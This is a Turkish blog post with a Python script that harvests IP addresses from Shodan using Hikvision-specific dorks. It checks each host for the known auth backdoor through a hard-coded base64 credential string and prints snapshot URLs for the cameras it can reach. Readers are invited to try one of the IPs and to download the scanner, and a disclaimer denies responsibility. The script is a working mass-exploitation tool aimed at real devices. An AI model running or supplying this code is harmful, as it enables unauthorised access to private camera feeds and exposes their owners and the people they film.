Shodan’dan IP’lerin listesini alan Python dosyası, ardından Hikvision kameralarının yazılımlarında arka kapı olup olmadığını kontrol ediyor.
Elde edilen IP adreslerinden birisini deneyelim.
Kodu bilgisayarınızda çalıştırmak için :
python request modülü ve shodan modülünün yüklenmesi gerekmektedir.
python -m pip install requests
python -m pip install shodan
#Required libs: requests and shodan.
import requests
import shodan
#'''"Server: App-webs/" "Content-Length: 1862"'''
import os
# Configuration
API_KEY = "YOUR_SHODAN_API_KEY"
dorks=['''3.1.3.150324''','''Server: App-webs/''','''Content-Length: 1862''']
exploitable=[]
list_of_links=[]
exploit_check="/Security/users?auth=YWRtaW46MTEK"
get_snapshot="/onvif-http/snapshot?auth=YWRtaW46MTEK"
api = shodan.Shodan(API_KEY)
for dork in dorks:
result = api.search(dork)
for service in result['matches']:
ipx=service['ip_str']
portx=service['port']
if portx == "80":
full=f"http://{ipx}"
list_of_links.append(full)
elif portx == "443":
full=f"https://{ipx}"
list_of_links.append(full)
else:
full=f"http://{ipx}:{portx}"
list_of_links.append(full)
for link in list_of_links:
try:
x=requests.get(f'{link}{exploit_check}',timeout=3)
if x.status_code == 200:
print(f"[+] Hit! {link}{get_snapshot}")
exploitable.append(f'{link}{get_snapshot}')
except Exception:
print(f"[-] Timed out ({ipx})")
pass
for xddd in exploitable:
print(xddd)
print("Done!")
Python’da yazılmış Hikvision backdoor scanner dosyasını indir.
Not : Çalışma farkındalık oluşturmak amacıyla hazırlanmıştır. Kullanılması ve kameralara erişilmesi gibi durumlardan Turk IoT ve yazar ekibi kesinlikle SORUMLU DEĞİLDİR !!!
Bir yanıt bırakın
Yorum yapabilmek için oturum açmalısınız.